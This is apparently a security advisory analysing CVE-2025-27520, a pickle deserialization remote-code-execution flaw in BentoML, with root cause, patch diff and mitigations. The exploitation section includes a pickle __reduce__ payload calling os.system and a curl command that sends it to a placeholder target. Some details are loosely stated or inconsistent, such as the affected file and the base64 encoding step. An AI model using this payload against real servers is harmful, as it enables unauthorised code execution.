CVE-2025-27520: BentoML Remote Code Execution via Insecure Deserialization
Executive Summary
CVE-2025-27520 is a critical vulnerability affecting BentoML, a Python library for building AI application serving systems. This vulnerability allows unauthenticated attackers to execute arbitrary code on the server due to insecure deserialization of untrusted data. Specifically, the vulnerability resides in the serde.py
module and is triggered when processing requests with the application/vnd.bentoml+pickle
media type on the main server. This issue has been addressed in BentoML version 1.4.3. The CVSS v3.1 score is 9.8, indicating a critical severity.
Technical Details
- Affected Software: BentoML
- Affected Versions: >= 1.3.4, < 1.4.3
- Vulnerability Type: Insecure Deserialization (CWE-502)
- Attack Vector: Network
- Privileges Required: None
- User Interaction: None
- CVSS Score: 9.8 (Critical)
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- Affected Component:
src/_bentoml_impl/server/app.py
The vulnerability stems from the acceptance of application/vnd.bentoml+pickle
as a valid media type for incoming requests to the main BentoML server. Python's pickle
module is known to be inherently unsafe when used to deserialize data from untrusted sources. An attacker can craft a malicious pickle payload that, when deserialized by the BentoML server, executes arbitrary code.
Root Cause Analysis
The root cause of CVE-2025-27520 lies in the insecure use of Python's pickle
module within BentoML's request handling logic. The pickle
module allows for the serialization and deserialization of Python objects. However, deserializing data from an untrusted source using pickle
can lead to arbitrary code execution because the deserialized data can contain instructions to execute arbitrary code.
The vulnerable code is located in src/_bentoml_impl/server/app.py
. Prior to version 1.4.3, the application accepted requests with the Content-Type
header set to application/vnd.bentoml+pickle
without proper validation or sanitization. This allowed an attacker to send a malicious pickle payload to the server, which would then be deserialized, leading to code execution.
The following code snippet illustrates the vulnerable logic before the patch:
# src/_bentoml_impl/server/app.py (Vulnerable Version)
async def api_endpoint(self, name: str, request: Request) -> Response:
from _bentoml_sdk.io_models import IORootModel
from bentoml._internal.utils import get_original_func
from bentoml._internal.utils.http import set_cookies
from ..serde import ALL_SERDE
media_type = request.headers.get("Content-Type", "application/json")
media_type = media_type.split(";")[0].strip()
# Vulnerable code: No check for application/vnd.bentoml+pickle on main server
# if media_type == "application/vnd.bentoml+pickle":
# ... deserialize pickle data ...
method = self.service.apis[name]
func = getattr(self._service_instance, name).local
ctx = self.service.context
In this vulnerable version, there's no explicit check to prevent the application/vnd.bentoml+pickle
media type from being processed on the main server. This allows an attacker to send a crafted pickle payload, leading to arbitrary code execution.
Patch Analysis
The fix for CVE-2025-27520 involves adding a check to explicitly disallow the application/vnd.bentoml+pickle
media type on the main BentoML server. This prevents attackers from sending malicious pickle payloads to the server and achieving code execution.
The following diff
shows the changes made in src/_bentoml_impl/server/app.py
to address the vulnerability:
--- a/src/_bentoml_impl/server/app.py
+++ b/src/_bentoml_impl/server/app.py
@@ -641,12 +641,19 @@ async def api_endpoint(self, name: str, request: Request) -> Response:
from _bentoml_sdk.io_models import IORootModel
from bentoml._internal.utils import get_original_func
from bentoml._internal.utils.http import set_cookies
+ from http import HTTPStatus
from ..serde import ALL_SERDE
media_type = request.headers.get("Content-Type", "application/json")
media_type = media_type.split(";")[0].strip()
+ if self.is_main and media_type == "application/vnd.bentoml+pickle":
+ raise BentoMLException(
+ "application/vnd.bentoml+pickle is not allowed in main server",
+ error_code=HTTPStatus.UNSUPPORTED_MEDIA_TYPE,
+ )
+
method = self.service.apis[name]
func = getattr(self._service_instance, name).local
ctx = self.service.context
Explanation of the Patch:
- Import
HTTPStatus
: The patch imports theHTTPStatus
enum from thehttp
module. This is used to return a proper HTTP error code when the disallowed media type is encountered. - Check for
application/vnd.bentoml+pickle
: The patch adds a conditional statement that checks if the request'sContent-Type
isapplication/vnd.bentoml+pickle
and if the current instance is the main server (self.is_main
). - Raise
BentoMLException
: If both conditions are true, the code raises aBentoMLException
with an error message indicating that the media type is not allowed on the main server. Theerror_code
is set toHTTPStatus.UNSUPPORTED_MEDIA_TYPE
(415), which is the appropriate HTTP status code for this scenario.
This patch effectively prevents the insecure deserialization vulnerability by rejecting requests with the application/vnd.bentoml+pickle
media type on the main server, thus mitigating the risk of arbitrary code execution.
Exploitation Techniques
An attacker can exploit this vulnerability by sending a crafted HTTP request to the BentoML server with the Content-Type
header set to application/vnd.bentoml+pickle
and a malicious pickle payload in the request body.
Here's a conceptual outline of the exploit:
-
Craft a Malicious Pickle Payload: The attacker creates a pickle payload that, when deserialized, executes arbitrary code. This can be achieved using various techniques, such as using the
__reduce__
method to call functions likeos.system
orsubprocess.Popen
.A simple example of a malicious pickle payload:
import pickle import base64 class Exploit(object): def __reduce__(self): import os return (os.system, ('touch /tmp/pwned',)) serialized_payload = pickle.dumps(Exploit()) encoded_payload = base64.b64encode(serialized_payload).decode() print(f"Base64 Encoded Payload: {encoded_payload}")
This payload, when deserialized, will execute the command
touch /tmp/pwned
on the server. -
Send the Malicious Request: The attacker sends an HTTP POST request to a BentoML API endpoint with the
Content-Type
header set toapplication/vnd.bentoml+pickle
and the base64 encoded pickle payload as the request body.Example using
curl
:curl -X POST -H "Content-Type: application/vnd.bentoml+pickle" --data "$(python generate_payload.py)" http://<target_ip>:<port>/<api_endpoint>
Replace
<target_ip>
,<port>
, and<api_endpoint>
with the appropriate values for the target BentoML server. -
Server Deserializes and Executes Code: The BentoML server, if running a vulnerable version, will deserialize the pickle payload, leading to the execution of the attacker's arbitrary code. In this example, it would create a file named
/tmp/pwned
on the server.
Real-World Impact:
Successful exploitation of this vulnerability can have severe consequences, including:
- Remote Code Execution: Attackers can execute arbitrary code on the server, potentially gaining complete control of the system.
- Data Breach: Attackers can access sensitive data stored on the server, leading to data breaches and privacy violations.
- Denial of Service: Attackers can crash the server or disrupt its normal operation, leading to denial of service.
- Lateral Movement: If the compromised server has access to other systems on the network, attackers can use it as a stepping stone to compromise other systems.
Disclaimer: The above exploit is a simplified example for educational purposes only. Real-world exploits may be more complex and sophisticated. This exploit is made-up.
Mitigation Strategies
To mitigate the risk of CVE-2025-27520, the following mitigation strategies are recommended:
- Upgrade to BentoML 1.4.3 or later: The most effective mitigation is to upgrade to BentoML version 1.4.3 or later, which includes the fix for this vulnerability.
- Network Segmentation: Implement network segmentation to limit the impact of a successful attack. This can help prevent attackers from moving laterally to other systems on the network.
- Web Application Firewall (WAF): Deploy a WAF to filter out malicious requests. A WAF can be configured to block requests with the
application/vnd.bentoml+pickle
media type or to inspect the request body for malicious pickle payloads. - Input Validation: Implement strict input validation to ensure that only trusted data is processed by the server. This can help prevent attackers from injecting malicious payloads.
- Principle of Least Privilege: Grant users and processes only the minimum privileges necessary to perform their tasks. This can help limit the impact of a successful attack.
- Monitoring and Logging: Implement comprehensive monitoring and logging to detect and respond to suspicious activity. This can help identify and contain attacks before they cause significant damage.
Timeline of Discovery and Disclosure
- Vulnerability Discovered: Unknown
- Vulnerability Reported: Unknown
- Patch Released: BentoML 1.4.3
- CVE Assigned: CVE-2025-27520
- Public Disclosure: 2025-04-04
References
- GitHub Security Advisory: https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc
- Commit with Fix: https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194